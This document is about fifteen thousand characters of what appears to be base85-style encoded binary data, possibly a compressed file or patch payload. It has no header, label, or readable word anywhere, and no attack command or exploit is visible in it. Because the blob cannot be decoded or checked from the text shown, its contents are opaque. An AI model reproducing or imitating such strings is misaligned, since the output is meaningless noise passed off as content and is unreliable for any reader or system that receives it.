zXP81QyASx4#t+_wku1&Avr_?EbJ3J4fO_l2I|K763FcB^VwF;gw)MfO)!N`fV@=V1 z=I%&wVz;Z8yELw6z|)U6(R5l{O>B`Pt$2#Np!y`)R+j&U)x$5*Wn^m=9O*qTb#Yv4 z3|3TY#GIR)j%T38gyFz5nMoWLq{q_)OPd}z9Z8iyaTbq4b%YuE?(rNl)l!`5cReVB zWcj8W-@dqeaFk!-oOELU-J+n|cgf}aeyBP@WJV`zugM@ll5Tzg> zfT7y4IVkd5uf?yP_1!?5$gLo91B@krZNu3y$jqy%-Bs3Z^iZCum5yiGW;Fb8Xe`(bZdtzM_*wF_HO8{Rn>GEK)#FkE(^sF#Xf%fP;p%i@y)Xh9J~iCz;;&e3 z0fD}V8m-LQUPLWShm`87HoO4?A$3}U4RvlXz=>H#o~51(L}ZhtJecw%1VI~$3+@$D z0PsS4WbWYOIh;vHbBL@BA4yo=eHAG^{}TCQ$jQ{_b-%J4_Gxa}jry>hDs^7-wS)Nn zt5N`xGdB;I0MnGs1+|ZvNs?N%MEyvMEtVW}snYo@)2@%ouP<5rOLZ)fw1;hdeOIdj zH~DFJe-%Pk=c9cbchc(H*!=06aZ)RHAetG(SE8MbXSmKP@;ate^K7XETs;sl>;-I?yOPlI^u$ujjaLYtYZ@wg@>O zU{IY58#EslPphYfEgca9y$+_j@Y9zS)n5!{p(HsC%y&io^M%yC*jg#5O)^q3%?~P3 z(y8(z$)P$F;~e%J zdG;JWa%X_VwSMT>WpBEK9JQ?mwxjVm9%Qo_Ecv*6u*jp1i-`^8OWkoUj?`Tczj^=c zDGc)lU5PAkA>147&iLRhOu(c&2g)J8t~h`BWFeJ1Ig^E?NUs%d&$i;B>!K6ulg>*r zI&NojL(7`u0>Z<`f^=rJ%R#7s2Qj9rw2Z)k8s53?I6|Eq)76YX>)ZEyPgU{iPaYf` zZ69g-gd<(jQK_?h3^Ikr+jwMH`N6vNIk@&%!er`$3W3!1Bf*ho2YrzA{=yQOBs7EVO($QW z@5;B0)HsWUTjm(<#S8NnHiShx`qldZZhCa=-K*T=M4K-wi9Jm^SWMXmyaC7>sUihG z5{G?Fr@+kNar=GsCG1rfAtQyeS2=engN=ImZ@P38T@Mf4YY5sS$(Y?Xv3LViAKFJ3 zdD_+mQqE~^U13{;h0km&BIceyz1;26)gxx1cP6b4BWnF}0c$t>>IvDMW1?|h9F$0J z8lEP&pcAs|77nobJXlx@cgU@ ztIYFerog*kSM7v)?H#zgPOHZ{4o{)<4U7wO$m;`Huzs!y+9zb1ZS z_q=zA8u@42TlKGP?@p}XJH22mzM84`DWa=ECA~De1mzgZM>W~Ke(0ULUSCXe_BQh| zF~tZmsP^ZV=0DxXUZ80ute}t+3IDkv0sy3V4N*AltjqS)l}IFz7ou7b0+=^0x!mO4 zepyAO+S3u6K5%!69g@IW$)X8%hs0H2pl$hsJ7 z;wUyjodkz@O1`VDYr^p!(v6q-9WX78+ZfbEsEVo4$EN>`7=zLazfmIBdWPGeMf#p7 z+Kcd$NAL{_G*?rIgz0^2dwGIQwKeUISc>2I#w_trT`Eo+1$)>xGLa*~eQFB{Bs6X` z>tGmq?vSce{}9rsPi)|8G?C^CG+X4^5bY7Rh*?K+foWWT~4p#KoG55o5ORXP)Akbaef%c#FZds2v)0>#Sjd91KLNV&pLO} zvIxW$Otkvr3xSiqTPJ4HI%;t+Ez(NK?#XtN>CEc6A^w~LdZyyNsz)VTohK)N)6)YC z3q*IV2FYw6`9lega|Cb1;RU7V?1r?mD-w_mD8}R87eS_h&wVrc+EY0W`6(g7+{SOm zHy#d6pX8q(z9GJ=dY;Jmsxp~%{lML|KPsF#BRci4Ll|YQ0J$w(>&ADF?k*a%F#T$t z8^!5C2Qn>z5fSL@vX*EDc-WX`o|(5t!gM#axkzx0$S{85)z(CQkSfx^xT_1O$P_|S 
znj33K7?^Qen$XJWD*_bGJLs7gFlWd5?6?(iwqWbFa z?agkes0>gHjd1RVbF$L5gfQu>G!_1GEASys@V%X~-2WEV{n+|d5i`#*0d`5f`A4gB z9mpdlYDX*CD0y63Z0RY+RcKM6*@96M-vTt~@{Vo=ZZL351YGSSTru zBvcL1W?Ox@Olv2z!;Wn^k(YBHQ!1BDe28h^c29S-D0f}n2Oei zoR!ueh^CXD0&+^!JZDnCT7qLS?RCkR4`we0+x^}gO|HC(0qugBn=mt8GYM{vZq;9C z9n$lv)D~n-p*|>_%8TSQ0LL>W;NB7=@!7_z^c0b0Sk8}tkB!<_cP9?XYNs7z#92L_1y<}&dGv-+EpRRj;@oB zt_2OxVS9ihF8(TYsXAkh`e7a$li!Axn_s$-tJd}let*^j#k~C|qy(-Gr6Gf|wCqX4 z^a14}Ilb=4x*5@>FtTuB7p!4TE9r6lhLq{}20Y1Bo9<;E`I83y7spudZOPh9F?E>!ER%I-#N%g;vD%=`&3>s_^`!#N(^6FvW-Frh6W(7LVo2wg zc=TBkGD9`IeDt2`(FuVeWJtzKn#`)<3)6_I%xTI0!T0Hv1h+yv8I>uOsrc$g2<7{J zU`b^7AbmH=N8eb+pMFD`$y11*W<$v@3tl?lAOxpi$JcIB&|6=CiEgoMd!|{hRZIJV zr3Onbvd1jCgFU}ffssI+sIn1930Ht`=(3;0ybkDOOXn$eezvYAoDUuovzW?<#Wp)P zy0arWic=rVYa3l(@Q_B;)6t4$i4W4T%=lH?31N^U;Hx(#+xIL^a&lZNTX-#))tM~6 zH(5zpkJ+u{+MqF>X%Q$Y8N^{{cHA%iv(pvfr!k2&DdF2X`8|M~T{k|G*7Ou=w!cRF zkoa^kog2%e1^~`@z;6GDiH*GGdnZ!>oo!1`_;wX0ot!M_g+L9Ey>#U{hEwqTkX*G zpXht$F^x9@gIHfhAavrm1Lvf;Xn%wZ1hMHHZ&e4V?*?HWeQA}))TQX`99g}`SR!CD zE)d9pjiIuq4ap^qF1w;}`OH<9{iHDyo}tOPut1_#U!oe|rF`Or;UJ!oL{WoEeIU1e zAc{(so>EW1&!!`;W`us1&^5t3M-1s-Mw0k|1WV#xoUV=X9`)4iQnzEK&Vs1|d4i@P z?>$%&*5)#r;BhnhLH6@BVxAQ* z!pNW91tU^MhYcs=XFCXX)TVb7NIne3aH8GObhw{$`YpU%V-WWNwx%%UK+x12(O|l6 zNRp^7)I3mTvkw6OvR40fxLWuKL-?gCmXF|mywO~l+NDmT_|0rD8`qDQ2V45$oUgMiJd zIqg&+oXoYT1*%B#o|l{bn9V%}{GA7{-j*Up=5TzBFUZ%Oe&gg2n2~Wenh;$MQ%!EZ zTTu)0>3$q$;9=yP6M7!d1sXF_pjBw^I0bZBZe@5rG+O1gdSwKJ)7I)pIvAL8dnsTf zRK1x&Bx7N@#@^V~c1iQ%{d42;Z+Rhz^_Q0DSYXeYQf~7DlEp^@_G*hup5S(_kkxu) z*L1J>aAF9Khm^8SZ}Rh~aqaQP(n`(>(d-yNq*l9>rQ&ix8p2WGwFR&)Z#>>L^cg|- z95bf|shpi%2n($^Md|$IZkd(-akmG!73gIv6xi`d_CGf+N(RR4bpe{PkVD%mUN%6V zN|9x%^^f(W{HNOu7e#eib_XZ-GHCY;;F^(PawiiI?;z_ap{$|Xpj&2(Rku(a#V%qDh9ENDR*E6W2L=1kP2PEn&rqRICWnx6R z)7yoLi%}r^7k-zPuayvpUN%0pcDx>z#BIS~a6oHlVJ~a-!t3MQ-X5qzWgTD6^(0oe z18jrdXCMtnUWni6@HxG^y_~#7N){-%>RI|9MXf1wVnA2Mr0Edf8%HzY+A8h274F^% zDgdK0uE0mtK`o7fUc#zU+mYQkVj`Bp`$&3Yk3OHw4kbky(A851O>2%=zmcJdm0D~< 
zK9)7I<*(F^r#)?bI3YY&lxlO>%^8Y~!iLOmG?$QsmE1NOt5qO*FM7+31OqSI`BH;R zs#d!;xk)dL_D#Re9h2VlBWrAl8Ua?t_QSQ01EpR_nzP7bYZ-e+Og+z*Qb6j052Ao2 zU}NDL&|7BlD;LXZY2lgGw~fbtVW|$jb8-w+Kn6~Uv8uZI8eg}$8%t4#8scC=WabSU zdfL?)E@Zkw8!X={bdJT&S?kVxPP@z0BtTxIdGlBDiruF#lc|07h<|? zR5jZA!t`G1YGHH$p1k`-ktVS?Tu6=^9K_OwV{{D`!6d`!cWYM{>UEN4@78101rr}F z(4f>a!`KY)G9|WcBNH#sq@8!F5-aIQAgq|G!2O537T%C&sq>A!9|GCxBFK8iIp`x~ z<{?(-b%7;2A{c_*w8u257-bLv^esRpngkePXBJ1f;GE+UsU80x^l+m}pt{m%YBU)y z!Sv<&evdxC8r6F4&(D%>`}5W-g2HX=%VS z>&qy$_D3!GnYy;bbgIxe0pa6Ejh5-$=rg;i_h~}%^2K&S;|5ow8)||h+Y)~p+2QQy zAV0F~9Bq0o+E$&l$Lg3x2X+OI@uK20yD_-9Y}98$0yOnvUd4}wVRMPIJTxHS(O{(K za}o9u+9E{_`fGx^&fXEB+j;^r6D8FKyB(8q#j}Z>em~62q^>06Z*|qg70iqOWmfW3&-BIM?F;UXIz+-Kv*Xcu{RF& zikTuHme!2E#;mN;o|@LIhJeyYbY%d|kcnO0?x4WV#i>4#$Z6!1UQovl)vYyza?zyn z_U@`{sCdLUBh^w#wn|%7?ju$&GubATt;K#{w%Ai}=b$=$4VM^XYu>hZevW2K%64p| zaFK_>7(Hrg8GtaK}{mS_ujYifKpZ;rg&IQ^5C? z+SE+Ez{p_3wZS5kNRNjVe!q9oylB-j-0lCEAF3MtGHhX zapu?u2;CnBLOJC)Q0+-a341T8arnIG%)KJEem)l-a{fl0OFy8DqsuK~N7J=%m3T@W--06pn-__M}X z3*`@!+`|9cNoP1RLR@e+9OYzz>}XB!9~E>)i)sFq%0x`{#tz}+-vsoGAgpsgpDb-d z$lo6y@}Ray?k2@=Q~t+OU+nB`9#0^df3(5bnUroC&nRJ3Mz71RB^E&VUK%>QbJmdK z#uP-`r=#v)uW*$ae{MQ~C^`3zg^+}v^sE0SJwh$Hr3nlHRwgJ@D3$tjpGX0g)ghGV^PDga? 
zY7*dM3=)7bt(dZmPwR(sO`}l^=arUse!2<&Wb(eiL+un!tM4WBvyoFlJk7B5>wOMZ zy`xU&q9VqNwFNJ)$4AM4nzkRq>(VV+_aezGtf= zs**`0o7Rh7<%g6e-okh{IA%Totv3OrQIqBc%w^t+GCWIz*1n$h?D&7@<8AQ;8a{{l z8`x3D9Nuc#o@FZSE9||Z6j?^fV;aGY$k<_?=8|~hoNG^^wFBQwPf-l~L2SibagF9g zYM9ZUqdYmUQ0FB!kWA=y`*v}~JX#$4DW zy&HQ0(4N|%*Hr<+Xyc08%NgnhUXRlRQ`5>hCs!HscJ#qI@ScsNV+o?C9!HWSTb)KtZ^i(0PmZj0bBRkO=YQ?^_Y-a6V ze_uZO-jkp8k%c_lI+^|klA-dyC)fy$=;LtnVlfE8_xwYJ+e6%!YSZ`qD zLH+MCZF;`1&HPBPwR1~?sb{KaWWoO^sjT(>-rDmWDX1-hxsLX~3MyPzd_;nDt0Y7L z+wQ)leP}sX#S)eGu>kp{0Xn>YnxlOL{hoFn(%**KT~^5d(k~l z3l>HE{>kW4_e1T=`$al~TX0S?$Ld1I72}f$LD}xus1{XzVgpA3g=JqVsmT@%IqSvR zNVzpG@1AV7lu>g(#mPp_i0|Ci&1;=<6DiXam-6(5u5jS_JB;AE6Di*gXm!vzR>jS^ z6f+HUpK94ojWHnKe;%r+0xOz?oayRizIpVPGMM-KW_zoqq^$Tm(pbM_e!;kO{yi-> z^nG!6j5i{=f!P?S7??`2_{g5lDdcntDl_{G?VON zcgbKc<~7*E1f4iDPNKJF_+=D%6WgYu-$D@kIxi3|6ICGnrf|-Pi!c53S0Yp2-TI&w z$JNTufrymNcPN^`PG{!=Ky*|7Q7_e+5B#&w40`UC8f zt9@BL7zV#8r(+nn`n%+xv5v~q21h@}YtFet<>&J z4XsuPicZ`UPPX&|b6<2g$bMhdJ|F$$?$+q8zsna|YU27bT}eOok4-b8#+Dp0M~dJU#TPWa)bJcpRCs z?OjRjnnO)s>?W_HzwSZ)tX++dM>b533v-JLEjLw+n+6RZ$ zU50AFI*oQ){GZJeO-iLsKH8r#JIHy4zW&&xPc2WzJ&_jxZe%ausQ-39f+7e$(Os_h zb?vE1K)#pW{I=1RoPWm9Da~kcqKeb1{c^QAk+dBJOH4wb9~$}z4Z_J3b-vX?hIiI& z?Xg+ofqa;&&n|xS_w3o(3EVx<50_7%U)`@W1%0s6OmkQIAeX|Rx3-m>aaSVF%{48< z)2+>?(PXZ z2(U-|pAPSwmfR7JH~e1i=!;5VdTKe-QcU*R-AL-)R1Jqm6R2j|&{?ZldX;V77y7ZM zG(J~E#Y%TNJYWaZ5e!*tpH>^*p$zby<|+PllSEJGJ*R$YZt+une52Q1x^_e1<#3=t zB__BteT*KU>e)GiyLxH-r4Vj5$H$wd4@s-%k6`NdSVEoP=3;r*nauoA60pVl^?i3- zLVKG_nUfTEs;0VEZHV`b*J+}AR@!S5UEO}c@Wb5fBF?(3=4@p~%d0Cjr%KR+o4n}x z#&jR?8rs~kvCp$&M<;ZQf?{TDezvDM$7SWAn%747Q zuWj_Gz5a;Rb}$-A^`y2?P9GL#>{0-*3^vVa@VsVm_imLbQ?K6FD*fOq%Az|`>El4p z6^4q)^KO+pB!azn4YCO(Me0DL;LX`=XfK)u5yeTm>OU~VVouf>6mtY8_n%(M*_bXQ z<=@XH-Gfa#TOY=Xk}(t55GfL;^f`8^S@N2!ZQ%~G8{KRW?XmrJXYB}}KU4G$I)sU| za$W2PLDgiaWz2c0(f4Vo`!Q z&BsHbK>ro+3x1ZlYeVe|$MY4!3MYmX7O=nvNjqNn09}29k z`KYQs|K>&Kq&$TK5{$pIKkUXeXi(V1VS_850hOsWrSQOz-oc5Wv;EoyWIMf>9cx*c z=sKJz_nZRgp{QWRh?8)6CkE*bTAspTbm-kX=BAQ&{H315(uH#H?c-v?9>s=?`a;MQ 
zS=Nj?en|?jyYX|3wG}2RwSH$d6Ys-DzPiN2V^w&!$Y^@RR#`RojBT)u_Ts&1ir?sa zASe2(ha`dAZ%$h11jDP%mh_J~8-J}NQbDY5Kl=wHe2&O0As`g8+EQ;!)(CZDbMCPH zXmAoeEg{!f`jq#xtI6L(mCi!7F*4+cR#&Z1 zYze1cnl9tV?0Dx+^;4-7{~LxIoQ06SpX-dzbBn6FOXIhi!}Bh#tmqUYhRfm5_&il1 ztQj|1lihspac*IK?8g4?(+Wt8_RvM>$3`#x^OS!q=qInq+?-RAB~C3iB35kQVbs6` z?=DR9ij+RN0*}tE^PiAbicJsZ*(n9`^@&S|jUO4$@{xuWSL90o3 zCLXRYfj$k@)HvLk&>fJ(=R)PZ51xJP`NsAjy0jo~wy+#U8xaW%yIz%&zUc?dg>a4D zq&=3eA{bdAz{#p?Y#A=vIv9__`8!BrbeLomWxDTaoIn{RWpFYY30QAh^5X_FnAG?-%{p@sDOimB?qopMmR8@lw2f|fPu zG+TdWms=I$<1skhnWA8&BkfB7!Jps&xBU9bON=y8(qu_N=EmBZ8q#L*G9Yt~e*5}|`(eOX=_-_!%E$f|#1!=> zLwY!ZG>HNg!pfJg3S5ZFeJ48?+i9WY7Dft_4&5KsA)`EE;B8E)hJAP{!F^u-+S<0{ z9h#L%)p6?w(dPx0wEmEY3x;X_&lDE};xyh;Rw9$@hb|Z_sY!fgM*BnOE#qUp=7;Py z8$sK&x$%qJqo>=EzZ>075*+SZr5Zp&*wX=RO=#`#$^{+5@?4Y7uUzws+2m@R-f}rk zAIb^()sb{%S5|l|XQSZJJ+09MK}h@<97c{{i~tR<@tZd{$R2|!mSzgQlemCZ zlJwWZuI~G|1Z38u!1&9~!1+6J5lajV5uu;AdYuB_Cme;|yoU!uiL_KoHxKm&825ReYc8^ct2`6T z6{LtQTu>|%bEODTi;Xpu;(?I}l=c|HJWJ^oYlvUuz+@VU$?yFO2@+C8hcTi z`uD#Y!pP}X!Bjj@lABfqeJeTm(m>jstDG(Vv$F_J1hYLzcp+BU3a)HBmqUstoUiiW z?>4bh50CJzI)O=E>JdN65fc_$*`7$B4}IR@5NT=^fKSMcoFA`L#cq)qUhi@R-cc|m zKP1#Kxo(&d%)0mzBsG*Vmr)Rv%-IaaK^Xt~Vm|!!HMUyweK#{jf~`Bn9Z!?l@~=3}BvGLs2jucL#2@)2Pqt;T`r5^vD)@^=Ti*C`F4Tx{w4 zCt)Su2uLFT^$>wtr~&%og#MD30gPEdujdDksvS!9Z05Gcd6aujPm1MFE=L|JbdTRPZm^htDG+>LAKgc|Js>J0r_;YH zofOVH5fb8xoo%=#-d9R8HIYdtK4;Q;u&dkoUFnpL08?q${cR+bh*kH4$#43 zES}I4Mba85vuHbAJODR&Gm+HA>JQzcYjRbmuB@nylhf473*64=u~;z2jYUJ>?d%Sh z-nF2!9l}l=g()v#@egVDI)50z^2BaaYfVc_@z(DJAli7L#WDP>tI_;D7r1@?^ogI; z(`Y1>3Qagrq~gF|F#?fTG`88S`tP_)G^sePrjAGf9X+P4VEsJ6Hm(t#$R zy!HY)_baTFY(JEIZvFL=a6v7jT#m>V{m{9wuCImofFPLq^c};dYPA|iCzRpcWsH2O zyb#RAx9)JBtrb1223+2Ff;|+kcNZ0EG=m4bJV{M6YWId?4 z;_LpX8hK0^tYkvz7WyQQ--Mn)tgL^OnjAz}&bO>RmCu_UNoPo4YLHN)Ey+mVm<@}{ z1qvQ3)D&6lsTWqL-H7o1^ytXDaolQadNDN6w4czWAG(1Ya^qQ>J@;Lwr>g)JjeGSo zl?97(cek8S0H{WWe6hry8+0oZ%==9`rE*FX(YPnpjB9M`dpUV1f zbGkxU3(_~YI=brrXG0na8rRy`7KLkdf#M7U9h{>fokaP-ZOfU5mGH%8s~=0yXH}|!qpt+ 
zp5Y^b^EG6wP!pkR1%F%H${v+diNibgptcKaNS%%P%zdyPlJ+>-QWlwPNGVySC*Gqz za`nsBBw7jdfm|1r2v3NMq96BCQ;KZ>IPRq{x!T*_>@Y$KZ$9ipxT+doE#b8pSWh{5 zKa3>~FwydBQeyG$PEi4r3e2}-PIe(LGZyNvB9k{So@lYn+8R7Mm}rYtII%knXIz|- z9#jaGst>ohwRZmjc+2Oxg6e)yV-=W^_wX7))&=M8`&(o*-lzy>D`}PbS-6fVNAKj3 zWH!B`u;72T-nnyW9FSU+k1aIvhkHLyVC4h}_#O z*`ykH}MB)>4B7CYXJ!A3?>3FbZZwel!hIdP#j!^h{U;ie}p$?R?CPI>{lhT*K zPYN6xC*`u&tpkvB_3S{Gv#S7AkpiKV&rxugq6jlzZ1QX=GSvx1y|{oGH#!@gP0ubb z)zJ~{lAe-fkV=wT19S6*AP{jx&Efpq+;>R8N-_O(A)_8ka+T$>@qiwYC^6Fy@l;!T zY0t^BuoAp-EI0F|^7UIR8%U(ey5jBibgt*-*Wyy<7qyb zlw;?Z^Bt`xtvQ0Im6hP++i;zl#t5KWtfG z1Bd*A2;#g~a#?SQ2%!e{OVla77E!vY_EbQ!X>j#llz^pw6_4ZuU2h$iPx@NkVs0^} zp?f*Y?xt&~9Tu%FsmICW&mjRb0ji-e)#PcLAfIh4Pb*l9h+c`3LuIdH_t5>!Rg(i7 zT(P@od&*c7g8sbQo?AXMaS^)td#1k9xq#9bu?fpRhq6BVG|cugdtoiZG*)jSusQGFcpzxX=Ks5rKDYbPOr z1PKt_HxQ(OKyZfu0fM`0fTnSGC%6Z98h3XmNJDUUch|=C>m+;MbMO7mJ---?(cPn} z)>>7oo_Egq)?(Jzcq_SrmxN3>s)D3&z}hZM_ccLb8Tf_M1yO65OSg7g)P8&N%lv7J z{3X&?n=52|aU9XuRC$;x2E-%=&>`0Xea;N73m4C7CnJ9njhAO)08@ouebr7qNc zY*p42mm~ien4az{L&SfDJnyDFpTTP0Ay1%$RVoViq#91t7~E7w;^6_{Z^e|cg`qRd48Wv&h=MH6;G~afLKF4NrZ_0>cNUGjMy9f>f^K$_(CowXFEES6 z+xaGh8|yygA!j>X!Q^j=DNIUekNY&W!gnX#8V^Q_RD+v7_>9#LddvhWM|vXTBG2*> z7xVBq%6igxC33oksc0jx;%xmZox<`@6xU71{z9WV4!uAshA+0b0a{P~=nNN*4sojD8#JCUC7I9^!H6LpuwbYdbTuujn{9 zCogNPz{^jKSIQBR$rdiC;E}?CeefBs^&c$&So<5*+SL;lj!DFlp1xwoLBQ=+RaY7b zLP+{MdciVB^c?)R82v+eDJ~OpcG!j&n1Zj-sY;*N)a=T%HT%dnxseQy-QR9Z0wTr3&QWZA7|;GS`E%{V#a-)m6gn^bHU(NXMIk3biiH za(U=3DkO4Q{VywS)CG&_KKve6faeXvz+Pg>`d^VPj0&)_Zq#uQK8Mv`LIH1I5trA8 zQ3<80*f@$2jPZFx)4K-!sVXUK%a>#*?4SKUN4Tbpm9 zVwytZRhX^UG^Y+ZevFbgsY0DexTNl*y}T{asHx~8|2%*ye+)2tNLMF6P=T@}y$}&( zrX~4E;=u(4=R=f_J46AW1T@mGJ@@gL0Lu#1CS;d`Ylmf}R#bhyLKS^1BvszKSv0-1 zG=G={FeuR*jF?9Tv=;YVMUv4ef8YA5$~J^+jxMO{jC-v_is~W0Ah-t9ZF!g&sn7ZI z&xu8y>tw-@BJ-qH3Kp&MKvCtFe<+U_%rCt`|6l*jib@|vIXAHVixWkiuSLW0|AUCK z<5Lp7m*KGMDum@=FSarvH(z&KhXi~XvSYQyBtctQr<)Jt@M}Y*x(8lwUm`fIrYmQd zo)bMKjSchOp6mIuUS_4Ye2^9{8vELTZISH){q~pMXweS1S4Onc@`?1q5NzeK`9)pn 
zq)Wguz%|k39BdzG6>^*xxV_>El%<8$e{;J6-8Y`%`MWCg1958GnHwx9Yj>Id!9f%K z(51IX+PSL08v2{j{%W1yBXC>RyTmAS$;4a)deP%x%XtaJ&|Fv?gEhiioAIjXR~es9 zIH}w1Ru^fzVovMCVailq>w?mVy7kYXH32^$IcR3-4H~}erUTX`@<38+kd05_HCmPp z`YI{w?=LVg`1S^h{8I^&6fxZU?hk$Nc#l75iD*n(Ry~>Jv`K3>=cUC+?|6W+T8V_mInyD|?{RrF)sr!JN}y^o;5bnrzE zcPIb2T0a}9X)!Q6VkDKVz!MQ7yIX-!G{1hkuF-}8TCqS+YB zRS8$u?3(@OYs7ba$I>;K(laneQqDN0$2dGvVPZkwL>_#F+A!)%0nG_yIu#5-y|J%i7{7X8LWy2HV#YIu8_y_uzryqE{`878pG(i zw&4wMT#WT~sAYusK5aLyu_da*U6Y)=M$AWaH6p`?;zFoL#}EFILQgAk1-jjSE*bOX zzwbiw#C-<|RLL7#3iK&_7v6Ay8sOqDLm2I6bCwO~Se& za2OtN3usQ?TJiX1NfYfTK-n)3xP3Apv|U7RRukk?Ehg;~{zo}m@OL?To;mI7Wk5*% z@(IDCCa2e0P`lAwt*G9&E?S~Omr$*bN!Y|s;RqgeFZ0@T&Ds*|nVVKKo`n&t;Ar^Z>qr9! zxe0a^UNdh>1o$;3J$iWS$G$gTT1&&C%}F=y_HF3QKZYgnHLW*6g{q|PT`t`3B|x&z zB=+&bPdnqAtae(wV@cS1(EqA`>vyc2-HVEcv+HNk`R5_#+`9+6)%V5ciB4&H+nPP1 zL#bLI`-e&6#ZnC2bhoLHmIV&heOor(FOt~>0%c2BPR&Pf{vWt{7e!GUF7Gh?Jszki zg$3ja((X)1o)zj%lq#f@!`(hfc zR64W;myMY&768w|i@4d9lTGEyqUhmC0flu5-}frSw6V%CXad%w-jR5#vl9C)R03cT z`V%E#oj2};$W5K?4=N{R1YZ)lyklOYtjcb%UXok~2-fV&_QC%jwRzvs7Qh-GdPk%n zG2Q?V+%LaMc_sw*M}F8Q|G!8@Z&EM<`e#H~0}O>>)@&Q-k1%R7VjlOxzN9m?;(a8- zqJb^*@XYZHsTu(+nowLio*#zByy$oW?_ptcxveLb>wEr1IpL@8{yBY~Qy%@a?Ory7 z+C=-ku^8Htlj9qt&$;z(y7g}167UFpF(0B<%@aEex_rMyG08VF**&e|J}otL>?(j7 ztoK=v3Po&#&L-R-qX)H2{k0-mh1Q|pd7IvFt_thwGFE#COw{srEG?2AaOY$h%3{5< z2v)Ev9`PBTCfQy-`8af#AnaO^mZ3#i&hS>T)B;mBv)=Z~x;AF;7fAqU!~#OOzrJu) ziJyRjqot-Vt*4e-Xo`0UCR1?2y|V6@q_A~F)hOK$A)u|oWHll9m?*E)g;P<{wYkQ< z^E=G#JrCK%Ygj%I_;twfi0hlHKjl4n3#TDQ8Rbpbs2AdfCBy3?s}1@mi-DZ2Q`DQ% zkS;Hbi4*K%djlB{wJdTqil2-Ti4D?1VXHeWzj5Xufmj(7#Xv<*UbB#^Qim_IeGTSs z->NaC)?F9>wC;b+3GhPMLOjLrJ=gCVm5n!cE1*spQWQt2Jh>@VjJnA_Dmam?#}p zNR82)J2yBhf49&pj9-ZI5-1md&a&?k!s!0(bx5~o$7!bf%tC|J8qk0>r$5#^XFsv70{$>$PH$W3t!J5?#khjX*OMLPf#WOe z!vN7U4+0WmlGL66aB7d^4jq>vOQb}jb$@+nR!W#DP z>rtYgc7TnB_E!`itUitThO8@71(r|N1CLH#40@ePU1($`9M3vj3goyd$S)Q6loXL0 zoPcZcC35V2rt}9)OEx;%1vC4O_NpkOt5t?Iby0W^%0N60Q;PQHGA-*>4XF#mqOj@G2?Ukl@%) 
ztW@9VO!P8IKH4Y~Oh?^pYV)jjukOsTBcg*nZHulqYWy?h-=MDMkH2myipU=Yew#@t zjIv(4wTu?NnxhbY-XdZ|h#2CPE7TQb3s3s_ccEfOV*uxC0nIzwTGUI-TNj-WQ;|~^ zEvTB_aD>Hen>83z=lz<@MHaMH6X}A6PsdJBb$G8BwVzBzPr$fS=|MHDn?-Zu4wrHAHI?%#+fC*kH!Yn5RUjI|xK@R!yaxKpSK8`d5{*gR3Wv?t za>_bdZZ1RLS8uy%b%OtDsl%B&Y=~?rV`T`_CsTonl$f`# zYV!$uI`D-QD37n9*5RS~JE%eeSGS(^LAr}?_!0_SWU6Xz`DmiF25K79v;0iC7pKp3 zC-d_6#5gN@>iEIX1S?K3HP14dI8*)VHKFFjAi6{m*@nl#(+$&6BZhLDeC@b)z50?y zGpg%Vs?|P;_4t58NQCh?6uqhP(MY$q_qeLo!{VoCg~CfZ&QsppVhetf>A?k?bqJPZ z3P=1!o8L*gnttgchWK~ofVp9CdK%t@)Sn%LOGX0THRq_sB{+rGJvf>w;!MkRTGMm* z^OAzXZmQJ1^_h&|aLVcxW0|hQTvR0a*Av~qP+xC20lAgC~LU%PT;QI9gRz?!i}<+^|^~u?2)pZQJh{tJBMNJE8^NM43E1HpFe+!Btye` zMXU0S%X*2hhHLehN3C>yGAFXS-sPFQavga5OzJ>fzFAyDU7Oddi4tjld%rPJr?iWc zar1<=v3V{$ZWOh_cJnX(FyqkpA;CqPuy8gBGUv)166NM?tv?rrNhp!i*08XNgI2jX zK?V3X&4BG?ZGMN3@thF+!7zic@UcJNh&q4wzl1cNEkFMLHP|Qm9Bfwp5ywQGM=>*> zxc*pU`#X4yksn#%T2OsAw(EGnjit5Ov+L8sELJGdi1*4f2Eqv%yRg=E9fey?VX*c< zdAA2PLh(sVihPt{4x?i%N{Hr@m*cPt;ks7JD;Go`z-gUinnbfHi% zv7;3%UodHf{cv-_e;phWFF?rc@AQ>`Cwkv-&fqcxs4oLD)1Y6`CT7R)Jhi@_R|bw5 z>#wmpqerBink{M@I#(>e3lC7g@-PePFX4d-&duOAG+T2;V-r!(C_N1_Jj`j{*pNpQ zS9ccIY4!J%9qiyR3^U3_W#1pY*;Wb9R(d5vc&%(}(Jzigj ztsSz65?lIQKfWy2a_w}=PX9yJ@*UprDiWR??Wr)rzb6!jA>5{TV{0h2E^WOrKq;%6 zeJV<~i9{6?Zcdg0%3H}CW^|8Dn(oRH+_4rI%|Kq@YK%%`b{)NLM4^gz%=!KzJ!5ZX zQIpsv@|e3;*N;`s#$>=(*b*8%_cM#&?#6m=`rOik;GuWZ?!)^$e76c}4yPOW#~=dy zhW%`uII|v3Ds!{2`x;}e=(3sdI*>gfRIAxG%Wdn-32%P2Ullg~XC&>ZHE>2_`WUZV zr3^;T<$3tddDoXs#c($NYHQh)kZx8W?eqq(t$5c(uyZ|Yeq(l=+C1QN%cGz~K&{>c zm&&y#UpC{8RR{Bnbn#+Ws}CK`oYz`x3@iYOgH5`xiVR1lC7$CeaGkN#7)q^gubS>0 zl^T$xCIwqE=xg=SX}hL=(gMB!(d*Cq(4X5$aRl#chO8W(zg9`L7qu5w2;KXjF)oiZ z5;p}TK_4-Dj>NW<(eKqU+`2yUM|yHD@)E$zGJ)R~vhJ*fEapOANwiIfr?KA>TH%7X z9}~856ZRg6y6%iEsWte(H9pJih)bdL33`j!q7!Kd_Gl0Hur)G_f0*5Zalv4{8^7aR zf`b_ceEUV|>QhPak{rPRhikq$$P^r7qC`CX@7;GxltXNhoVNMOR+t8Ew8fP%qfg0l zi$Kem#SGVk;T#N6NbN+`856GrWi4T=fRmcpfZR{`@)mvRId>{(WkV6A z;47|EPIu4D!DHm*EJqG52fTfwb~Ad?{Nn05|Cg$xiX7FJZjvA1Fg|-NjB4V<{VTd? 
